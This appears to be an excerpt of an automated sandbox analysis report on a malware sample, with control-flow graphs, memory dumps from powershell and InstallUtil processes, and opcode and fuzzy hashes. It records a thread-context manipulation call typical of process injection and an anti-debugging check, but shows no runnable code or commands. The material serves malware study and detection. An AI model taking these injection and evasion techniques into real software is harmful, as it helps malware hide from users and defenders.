                                                              • Opcode Fuzzy Hash: 7b55b2ffff89b8bd0a72bebb0009d855be59bbf09d67d5157d52cabadda9d64d
                                                              • Instruction Fuzzy Hash: 921137B1D1420A8FDB10CF9AC884BDEBBF4EB88310F15C469D468A3250D378A955CFA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 542 277e0f-277e50 543 277e52-277e5a 542->543 544 277e5c-277e88 Wow64SetThreadContext 542->544 543->544 545 277e91-277eb2 544->545 546 277e8a-277e90 544->546 546->545
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,00277543), ref: 00277E7B
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.515993263.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_270000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 636159b41a93849e55a945b9d41617ffea94591f5766bded73514921205b3321
                                                              • Instruction ID: e183f53c6997075847e3dc1530d0815aac96fe4cd4896c6330d8109286ba4018
                                                              • Opcode Fuzzy Hash: 636159b41a93849e55a945b9d41617ffea94591f5766bded73514921205b3321
                                                              • Instruction Fuzzy Hash: 3E1107B1D1424A8FDB10CF9AC884BDEBBF4EB89310F15C569D468A3650D3789945CF61

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 548 8c0fd0-8c0ff3 549 8c11ce-8c11e2 548->549 550 8c0ff9-8c0ffe 548->550 562 8c11e4-8c11e9 549->562 551 8c1016-8c101a 550->551 552 8c1000-8c1006 550->552 555 8c117b-8c1185 551->555 556 8c1020-8c1024 551->556 553 8c1008 552->553 554 8c100a-8c1014 552->554 553->551 554->551 558 8c1187-8c1190 555->558 559 8c1193-8c1199 555->559 560 8c1026-8c1035 556->560 561 8c1037 556->561 563 8c119f-8c11ab 559->563 564 8c119b-8c119d 559->564 565 8c1039-8c103b 560->565 561->565 562->562 567 8c11eb-8c1216 562->567 570 8c11ad-8c11cb 563->570 564->570 565->555 571 8c1041-8c1061 565->571 568 8c121c-8c1221 567->568 569 8c1383-8c139a 567->569 572 8c1239-8c123d 568->572 573 8c1223-8c1229 568->573 584 8c139c-8c13a1 569->584 595 8c1080 571->595 596 8c1063-8c107e 571->596 578 8c1332-8c133c 572->578 579 8c1243-8c1245 572->579 575 8c122d-8c1237 573->575 576 8c122b 573->576 575->572 576->572 585 8c133e-8c1347 578->585 586 8c134a-8c1350 578->586 582 8c1255 579->582 583 8c1247-8c1253 579->583 591 8c1257-8c1259 582->591 583->591 584->584 593 8c13a3-8c13b5 584->593 587 8c1356-8c1362 586->587 588 8c1352-8c1354 586->588 594 8c1364-8c1380 587->594 588->594 591->578 597 8c125f-8c1261 591->597 598 8c13c5 593->598 599 8c13b7-8c13c3 593->599 602 8c1082-8c1084 595->602 596->602 603 8c1271 597->603 604 8c1263-8c126f 597->604 600 8c13c7-8c13c9 598->600 599->600 606 8c13cb-8c13d1 600->606 607 8c1415-8c141f 600->607 602->555 605 8c108a-8c108c 602->605 610 8c1273-8c1275 603->610 604->610 611 8c109c 605->611 612 8c108e-8c109a 605->612 613 8c13df-8c13fc 606->613 614 8c13d3-8c13d5 606->614 616 8c142a-8c1430 607->616 617 8c1421-8c1427 607->617 610->578 615 8c127b-8c127d 610->615 618 8c109e-8c10a0 611->618 612->618 634 8c13fe-8c140f 613->634 635 8c1462-8c1467 613->635 614->613 623 8c127f-8c1285 615->623 624 8c1297-8c129b 615->624 620 8c1436-8c1442 616->620 621 8c1432-8c1434 616->621 618->555 629 8c10a6-8c10c6 618->629 631 8c1444-8c145f 620->631 621->631 625 8c1289-8c1295 623->625 626 8c1287 623->626 627 8c129d-8c12a3 624->627 628 8c12b5-8c132f 624->628 625->624 626->624 632 8c12a5 627->632 633 8c12a7-8c12b3 627->633 646 8c10de-8c10e2 629->646 647 8c10c8-8c10ce 629->647 632->628 633->628 634->607 635->634 651 8c10fc-8c1100 646->651 652 8c10e4-8c10ea 646->652 649 8c10d0 647->649 650 8c10d2-8c10d4 647->650 649->646 650->646 655 8c1107-8c1109 651->655 653 8c10ec 652->653 654 8c10ee-8c10fa 652->654 653->651 654->651 656 8c110b-8c1111 655->656 657 8c1121-8c1178 655->657 659 8c1115-8c1117 656->659 660 8c1113 656->660 659->657 660->657
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.516335466.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_8c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 22db7d3652f54ccf9a216b20fc79315c2d1b2b1ec4d183591206c8896c8bbf93
                                                              • Instruction ID: 4c8882558bf06467075e49fb6128d179f02f540aba503014086f0541d5b44a4e
                                                              • Opcode Fuzzy Hash: 22db7d3652f54ccf9a216b20fc79315c2d1b2b1ec4d183591206c8896c8bbf93
                                                              • Instruction Fuzzy Hash: 68C11235B042458BDF249A658894B6ABBB2FFC3310F24806ED555CB352DB75CD41C7A2

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 662 8c19a8-8c19ce 663 8c1b7a-8c1bc2 662->663 664 8c19d4-8c19d9 662->664 672 8c1bc8-8c1bcd 663->672 673 8c1cf4-8c1d25 663->673 665 8c19db-8c19e1 664->665 666 8c19f1-8c19f5 664->666 670 8c19e5-8c19ef 665->670 671 8c19e3 665->671 668 8c19fb-8c19fd 666->668 669 8c1b26-8c1b30 666->669 674 8c1a0d 668->674 675 8c19ff-8c1a0b 668->675 676 8c1b3e-8c1b44 669->676 677 8c1b32-8c1b3b 669->677 670->666 671->666 678 8c1bcf-8c1bd5 672->678 679 8c1be5-8c1be9 672->679 696 8c1d35 673->696 697 8c1d27-8c1d33 673->697 680 8c1a0f-8c1a11 674->680 675->680 681 8c1b4a-8c1b56 676->681 682 8c1b46-8c1b48 676->682 684 8c1bd9-8c1be3 678->684 685 8c1bd7 678->685 688 8c1bef-8c1bf1 679->688 689 8c1ca6-8c1cb0 679->689 680->669 686 8c1a17-8c1a1b 680->686 687 8c1b58-8c1b77 681->687 682->687 684->679 685->679 691 8c1a1d-8c1a2c 686->691 692 8c1a2e 686->692 694 8c1c01 688->694 695 8c1bf3-8c1bff 688->695 698 8c1cbd-8c1cc3 689->698 699 8c1cb2-8c1cba 689->699 701 8c1a30-8c1a32 691->701 692->701 702 8c1c03-8c1c05 694->702 695->702 704 8c1d37-8c1d39 696->704 697->704 705 8c1cc9-8c1cd5 698->705 706 8c1cc5-8c1cc7 698->706 701->669 707 8c1a38-8c1a3a 701->707 702->689 708 8c1c0b-8c1c0d 702->708 709 8c1d3b-8c1d5a 704->709 710 8c1da7-8c1db1 704->710 711 8c1cd7-8c1cf1 705->711 706->711 713 8c1a3c-8c1a48 707->713 714 8c1a4a 707->714 717 8c1c0f-8c1c15 708->717 718 8c1c27-8c1c29 708->718 738 8c1d5c-8c1d68 709->738 739 8c1d6a 709->739 715 8c1dba-8c1dc0 710->715 716 8c1db3-8c1db7 710->716 721 8c1a4c-8c1a4e 713->721 714->721 722 8c1dc6-8c1dd2 715->722 723 8c1dc2-8c1dc4 715->723 724 8c1c19-8c1c25 717->724 725 8c1c17 717->725 727 8c1c30-8c1c32 718->727 721->669 728 8c1a54-8c1a56 721->728 729 8c1dd4-8c1df2 722->729 723->729 724->718 725->718 733 8c1c4a-8c1ca3 727->733 734 8c1c34-8c1c3a 727->734 736 8c1a58-8c1a5e 728->736 737 8c1a70-8c1a7b 728->737 743 8c1c3c 734->743 744 8c1c3e-8c1c40 734->744 746 8c1a60 736->746 747 8c1a62-8c1a6e 736->747 741 8c1a7d-8c1a80 737->741 742 8c1a8a-8c1a96 737->742 748 8c1d6c-8c1d6e 738->748 739->748 741->742 749 8c1a98-8c1a9a 742->749 750 8c1aa4-8c1ab4 742->750 743->733 744->733 746->737 747->737 748->710 752 8c1d70-8c1d8d 748->752 749->750 756 8c1acc-8c1b23 750->756 757 8c1ab6-8c1abc 750->757 759 8c1d8f-8c1da1 752->759 760 8c1df5-8c1dfa 752->760 761 8c1abe 757->761 762 8c1ac0-8c1ac2 757->762 759->710 760->759 761->756 762->756
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.516335466.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_8c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c289c29f391488ad2e6f03ae2f45d4c22e48b38bd3d1e850baa7fc3da1839b36
                                                              • Instruction ID: 51ef48615b08bbcf26f3f634a52df7886a04638b5587984c5ba853ea90b48afc
                                                              • Opcode Fuzzy Hash: c289c29f391488ad2e6f03ae2f45d4c22e48b38bd3d1e850baa7fc3da1839b36
                                                              • Instruction Fuzzy Hash: 6CB10335704215DFDF258A648894BBABBB2FF83310F2480AEE955CB252DB71CD42CB61

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 833 8c0fc8-8c0ff3 834 8c11ce-8c11e2 833->834 835 8c0ff9-8c0ffe 833->835 847 8c11e4-8c11e9 834->847 836 8c1016-8c101a 835->836 837 8c1000-8c1006 835->837 840 8c117b-8c1185 836->840 841 8c1020-8c1024 836->841 838 8c1008 837->838 839 8c100a-8c1014 837->839 838->836 839->836 843 8c1187-8c1190 840->843 844 8c1193-8c1199 840->844 845 8c1026-8c1035 841->845 846 8c1037 841->846 848 8c119f-8c11ab 844->848 849 8c119b-8c119d 844->849 850 8c1039-8c103b 845->850 846->850 847->847 852 8c11eb-8c1216 847->852 855 8c11ad-8c11cb 848->855 849->855 850->840 856 8c1041-8c1061 850->856 853 8c121c-8c1221 852->853 854 8c1383-8c139a 852->854 857 8c1239-8c123d 853->857 858 8c1223-8c1229 853->858 869 8c139c-8c13a1 854->869 880 8c1080 856->880 881 8c1063-8c107e 856->881 863 8c1332-8c133c 857->863 864 8c1243-8c1245 857->864 860 8c122d-8c1237 858->860 861 8c122b 858->861 860->857 861->857 870 8c133e-8c1347 863->870 871 8c134a-8c1350 863->871 867 8c1255 864->867 868 8c1247-8c1253 864->868 876 8c1257-8c1259 867->876 868->876 869->869 878 8c13a3-8c13b5 869->878 872 8c1356-8c1362 871->872 873 8c1352-8c1354 871->873 879 8c1364-8c1380 872->879 873->879 876->863 882 8c125f-8c1261 876->882 883 8c13c5 878->883 884 8c13b7-8c13c3 878->884 887 8c1082-8c1084 880->887 881->887 888 8c1271 882->888 889 8c1263-8c126f 882->889 885 8c13c7-8c13c9 883->885 884->885 891 8c13cb-8c13d1 885->891 892 8c1415-8c141f 885->892 887->840 890 8c108a-8c108c 887->890 895 8c1273-8c1275 888->895 889->895 896 8c109c 890->896 897 8c108e-8c109a 890->897 898 8c13df-8c13fc 891->898 899 8c13d3-8c13d5 891->899 901 8c142a-8c1430 892->901 902 8c1421-8c1427 892->902 895->863 900 8c127b-8c127d 895->900 903 8c109e-8c10a0 896->903 897->903 919 8c13fe-8c140f 898->919 920 8c1462-8c1467 898->920 899->898 908 8c127f-8c1285 900->908 909 8c1297-8c129b 900->909 905 8c1436-8c1442 901->905 906 8c1432-8c1434 901->906 903->840 914 8c10a6-8c10c6 903->914 916 8c1444-8c145f 905->916 906->916 910 8c1289-8c1295 908->910 911 8c1287 908->911 912 8c129d-8c12a3 909->912 913 8c12b5-8c132f 909->913 910->909 911->909 917 8c12a5 912->917 918 8c12a7-8c12b3 912->918 931 8c10de-8c10e2 914->931 932 8c10c8-8c10ce 914->932 917->913 918->913 919->892 920->919 936 8c10fc-8c1100 931->936 937 8c10e4-8c10ea 931->937 934 8c10d0 932->934 935 8c10d2-8c10d4 932->935 934->931 935->931 940 8c1107-8c1109 936->940 938 8c10ec 937->938 939 8c10ee-8c10fa 937->939 938->936 939->936 941 8c110b-8c1111 940->941 942 8c1121-8c1178 940->942 944 8c1115-8c1117 941->944 945 8c1113 941->945 944->942 945->942
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.516335466.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_8c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e1e56ef165609cc786f223ea3b400db25d2f65761ccbd477a1dc4e1492c012c
                                                              • Instruction ID: dc5a9ca52015faa02af386caca20c2eb584ffbb5c306cb10a96f2bc838357d3e
                                                              • Opcode Fuzzy Hash: 5e1e56ef165609cc786f223ea3b400db25d2f65761ccbd477a1dc4e1492c012c
                                                              • Instruction Fuzzy Hash: 9831D334700649CBEF249A618599F7AB7B1FF82354F28806ED908DB253D775CD81CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.516335466.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_8c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30926ae6de0b6aa78ec26eda45ae872b089f48e218eff8b681a2a90aab1ccd9b
                                                              • Instruction ID: 373a17087097d7c97f959cb509650ff3a120dcf7cc20f95697ffa96e7b2afc79
                                                              • Opcode Fuzzy Hash: 30926ae6de0b6aa78ec26eda45ae872b089f48e218eff8b681a2a90aab1ccd9b
                                                              • Instruction Fuzzy Hash: F2117035A4420ACEDF258E14C5C8FBAB7B1FF56315F24806EE815DB202D771C982CB91
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.516335466.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_8c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e6aba3ae85e0b280542d77169502b148f79b215b5b8f4b3f8b1ef5b6de7f49be
                                                              • Instruction ID: afd6305a17bb533a6eca345fa4b1ff62b31755082bff55e9e55267aea8b03729
                                                              • Opcode Fuzzy Hash: e6aba3ae85e0b280542d77169502b148f79b215b5b8f4b3f8b1ef5b6de7f49be
                                                              • Instruction Fuzzy Hash: 04016D31A44209CFCF248E19C588F7AB7B5FF96715F24806EE815DB202E771C981DB91
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.515773115.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_13d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c28d11506049fdb1af07992776191d6c3474463cdd9ffa106561825095d15d73
                                                              • Instruction ID: 021025b5dbc601e7694f2c3845625e0968eadaea9faa5d94d96bf3ecdb5f3669
                                                              • Opcode Fuzzy Hash: c28d11506049fdb1af07992776191d6c3474463cdd9ffa106561825095d15d73
                                                              • Instruction Fuzzy Hash: 2901807100D3C09FD7164B25DC84752BFA4EF43624F1984CBE8848F1A3C2685C45CB71
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.515773115.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_13d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4e055f158ed4aba96fdc45a64e9816379f91a54819ea1e754a521fd10cd4eec0
                                                              • Instruction ID: ea32a2103b8e55462f1bbdd5eee06afc5c0bfb7a8eca35a330f7a8052c4c63a6
                                                              • Opcode Fuzzy Hash: 4e055f158ed4aba96fdc45a64e9816379f91a54819ea1e754a521fd10cd4eec0
                                                              • Instruction Fuzzy Hash: 3101F271504340AAE7285E25FCC4B67BF98DF81B24F28C41AFC581B282C3799942CAB1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.516335466.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_8c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L
                                                              • API String ID: 0-2356790247
                                                              • Opcode ID: d247122d46497eca9da739cd9eddd2b3ded88f9bc58d634c42b5c467653c5015
                                                              • Instruction ID: adb951d559209206b1d031b102d61738437c8dfd7d769a2aa5a40cafb790fe74
                                                              • Opcode Fuzzy Hash: d247122d46497eca9da739cd9eddd2b3ded88f9bc58d634c42b5c467653c5015
                                                              • Instruction Fuzzy Hash: 62D10131B00258DFDF169A64C840BAEB7B2FFC1354F14806AE555DB2A2DB74DE41CBA2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.516335466.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_8c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: L4#p$L4#p$L4#p$P@z$P@z
                                                              • API String ID: 0-667355751
                                                              • Opcode ID: 4c482a6dcdc24122c080aebf5693484ea3ffc80582d119ba8135335cb3ae5b98
                                                              • Instruction ID: a66705614beb18803af1ddb298493bedc57ec972a42be2e5a49c6e56449fe216
                                                              • Opcode Fuzzy Hash: 4c482a6dcdc24122c080aebf5693484ea3ffc80582d119ba8135335cb3ae5b98
                                                              • Instruction Fuzzy Hash: 2D51CF31700218DBEB159E64D440BBE7BB2FBC1324F148469EA16DB2E1DB75CE41C7A2

                                                              Execution Graph

                                                              Execution Coverage:13.4%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:100%
                                                              Total number of Nodes:3
                                                              Total number of Limit Nodes:0
                                                              execution_graph 10972 2e5318 10973 2e535c CheckRemoteDebuggerPresent 10972->10973 10974 2e539e 10973->10974

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 2ef300-2ef321 1 2ef323-2ef326 0->1 2 2ef32c-2ef34b 1->2 3 2efac7-2efaca 1->3 12 2ef34d-2ef350 2->12 13 2ef364-2ef36e 2->13 4 2efacc-2efaeb 3->4 5 2efaf0-2efaf2 3->5 4->5 6 2efaf9-2efafc 5->6 7 2efaf4 5->7 6->1 10 2efb02-2efb0b 6->10 7->6 12->13 15 2ef352-2ef362 12->15 18 2ef374-2ef385 call 2e6948 13->18 15->18 20 2ef38a-2ef38f 18->20 21 2ef39c-2ef679 20->21 22 2ef391-2ef397 20->22 43 2ef67f-2ef72e 21->43 44 2efab9-2efac6 21->44 22->10 53 2ef757 43->53 54 2ef730-2ef755 43->54 56 2ef760-2ef773 call 2e6954 53->56 54->56 59 2ef779-2ef79b call 2e6960 56->59 60 2efaa0-2efaac 56->60 59->60 64 2ef7a1-2ef7ab 59->64 60->43 61 2efab2 60->61 61->44 64->60 65 2ef7b1-2ef7bc 64->65 65->60 66 2ef7c2-2ef898 call 2e0174 * 2 65->66 80 2ef89a-2ef89c 66->80 81 2ef8a6-2ef8d6 call 2e0174 66->81 80->81 86 2ef8d8-2ef8da 81->86 87 2ef8e4-2ef8f0 81->87 86->87 88 2ef8f2-2ef8f6 87->88 89 2ef950-2ef954 87->89 88->89 92 2ef8f8-2ef922 call 2e0174 88->92 90 2ef95a-2ef996 call 2e0174 89->90 91 2efa91-2efa9a 89->91 106 2ef998-2ef99a 90->106 107 2ef9a4-2ef9b2 90->107 91->60 91->66 101 2ef924-2ef926 92->101 102 2ef930-2ef94d call 2e696c 92->102 101->102 102->89 106->107 109 2ef9c9-2ef9d4 107->109 110 2ef9b4-2ef9bf 107->110 114 2ef9ec-2ef9fd 109->114 115 2ef9d6-2ef9dc 109->115 110->109 113 2ef9c1 110->113 113->109 119 2ef9ff-2efa05 114->119 120 2efa15-2efa21 114->120 116 2ef9de 115->116 117 2ef9e0-2ef9e2 115->117 116->114 117->114 121 2efa09-2efa0b 119->121 122 2efa07 119->122 124 2efa39-2efa8a 120->124 125 2efa23-2efa29 120->125 121->120 122->120 124->91 126 2efa2d-2efa2f 125->126 127 2efa2b 125->127 126->124 127->124
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.626814361.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (#?$#?
                                                              • API String ID: 0-1075051238
                                                              • Opcode ID: 099c9f621727abd825d649ed46e924399bca0d5b6c1ee7abdb0e7499fc760975
                                                              • Instruction ID: 2b5b142ecae00f8ce819867afd22a587ce5e1ae8bbe953df5cec26b62f1c4d4a
                                                              • Opcode Fuzzy Hash: 099c9f621727abd825d649ed46e924399bca0d5b6c1ee7abdb0e7499fc760975
                                                              • Instruction Fuzzy Hash: 39322F30E10759CFCB14EF75C89459DB7B2BFD9300F60C6AAE449AB254EB70A985CB90
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.626814361.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5fe7faed35c495ee1c5662cc6dd084de676dab7c8be9399502a76ce76dc8f39a
                                                              • Instruction ID: 390a4c3ff812c23d2462f5e9d4fc267fb3a9482edf6583766cdc713054a55cff
                                                              • Opcode Fuzzy Hash: 5fe7faed35c495ee1c5662cc6dd084de676dab7c8be9399502a76ce76dc8f39a
                                                              • Instruction Fuzzy Hash: E7430531C10B5A8ACB51EF69C8845ADF7B1FF99300F55C79AE4487B121EB70AAD4CB81
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.626814361.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96abb6469d02dd78fa6377110c975587643b43e59d9e935d1c7bf694e101dada
                                                              • Instruction ID: 1fbc285358668d173e09313098df5399c01699e3df5fc769a1284a02dee9304d
                                                              • Opcode Fuzzy Hash: 96abb6469d02dd78fa6377110c975587643b43e59d9e935d1c7bf694e101dada
                                                              • Instruction Fuzzy Hash: 58333D30D1075A8ECB11EF69C8846ADF7B1FF99300F54C69AE449B7211EB70AAD5CB81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1189 451d68-451d86 1190 451d88-451d8b 1189->1190 1191 451da2-451da5 1190->1191 1192 451d8d-451d9b 1190->1192 1193 451da7-451db1 1191->1193 1194 451db2-451db5 1191->1194 1200 451d9d 1192->1200 1201 451e0e-451e24 1192->1201 1195 451db7-451dd3 1194->1195 1196 451dd8-451ddb 1194->1196 1195->1196 1198 451ddd-451df7 1196->1198 1199 451dfc-451dfe 1196->1199 1198->1199 1202 451e05-451e08 1199->1202 1203 451e00 1199->1203 1200->1191 1207 452040-45204a 1201->1207 1208 451e2a-451e33 1201->1208 1202->1190 1202->1201 1203->1202 1210 451e39-451e56 1208->1210 1211 45204b-452087 1208->1211 1221 45202d-45203a 1210->1221 1222 451e5c-451e84 1210->1222 1215 452089-45208c 1211->1215 1217 452092-45209e 1215->1217 1218 452139-45213c 1215->1218 1223 4520a9-4520ab 1217->1223 1219 45215f-452162 1218->1219 1220 45213e-45215a 1218->1220 1224 452398-45239a 1219->1224 1225 452168-452177 1219->1225 1220->1219 1221->1207 1221->1208 1222->1221 1243 451e8a-451e93 1222->1243 1226 4520c3-4520c7 1223->1226 1227 4520ad-4520b3 1223->1227 1229 4523a1-4523a4 1224->1229 1230 45239c 1224->1230 1241 452196-4521da 1225->1241 1242 452179-452194 1225->1242 1234 4520d5 1226->1234 1235 4520c9-4520d3 1226->1235 1232 4520b5 1227->1232 1233 4520b7-4520b9 1227->1233 1229->1215 1236 4523aa-4523b3 1229->1236 1230->1229 1232->1226 1233->1226 1239 4520da-4520dc 1234->1239 1235->1239 1244 4520f3-45212c 1239->1244 1245 4520de-4520e1 1239->1245 1249 4521e0-4521f1 1241->1249 1250 45236c-452382 1241->1250 1242->1241 1243->1211 1247 451e99-451eb5 1243->1247 1244->1225 1268 45212e-452138 1244->1268 1245->1236 1255 45201b-452027 1247->1255 1256 451ebb-451ee5 1247->1256 1259 452357-452366 1249->1259 1260 4521f7-452214 1249->1260 1250->1224 1255->1221 1255->1243 1272 452011-452016 1256->1272 1273 451eeb-451f13 1256->1273 1259->1249 1259->1250 1260->1259 1271 45221a-452311 1260->1271 1320 452313-45231d 1271->1320 1321 45231f 1271->1321 1272->1255 1273->1272 1279 451f19-451f47 1273->1279 1279->1272 1285 451f4d-451f56 1279->1285 1285->1272 1286 451f5c-451f8e 1285->1286 1294 451f90-451f94 1286->1294 1295 451f99-451fb5 1286->1295 1294->1272 1298 451f96 1294->1298 1295->1255 1296 451fb7-45200f 1295->1296 1296->1255 1298->1295 1322 452324-452326 1320->1322 1321->1322 1322->1259 1323 452328-45232d 1322->1323 1324 45232f-452339 1323->1324 1325 45233b 1323->1325 1326 452340-452342 1324->1326 1325->1326 1326->1259 1327 452344-452350 1326->1327 1327->1259
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.627334467.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_450000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: D'?
                                                              • API String ID: 0-3832636246
                                                              • Opcode ID: 9d6c4410d381f6ec9ed9a57f7ae86506248214de477b442038a164a4ce20e3a2
                                                              • Instruction ID: e0367a1528c4e83cfe453a099e68648adbf442e8e94150c502ced3c6bc5d0119
                                                              • Opcode Fuzzy Hash: 9d6c4410d381f6ec9ed9a57f7ae86506248214de477b442038a164a4ce20e3a2
                                                              • Instruction Fuzzy Hash: 3D02D130B002148FDB18EF74D5946AEB7E2EFC5301F14842AE8059B396DB79ED86CB90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1452 2e5318-2e539c CheckRemoteDebuggerPresent 1454 2e539e-2e53a4 1452->1454 1455 2e53a5-2e53e0 1452->1455 1454->1455
                                                              APIs
                                                              • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 002E538F
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.626814361.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID: CheckDebuggerPresentRemote
                                                              • String ID:
                                                              • API String ID: 3662101638-0
                                                              • Opcode ID: f4734331dd2e24c26536c5047cdd7c69f622976fc70f993bc5cc46d1adb5c3d9
                                                              • Instruction ID: fee371b16750aa7f79d9b02325507d596462c45f711161cd02402d97ba1392a5
                                                              • Opcode Fuzzy Hash: f4734331dd2e24c26536c5047cdd7c69f622976fc70f993bc5cc46d1adb5c3d9
                                                              • Instruction Fuzzy Hash: AC2139B19002598FDB00DF9AD4847EEFBF4AF49314F14845AD855B7350D778AA44CF61

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
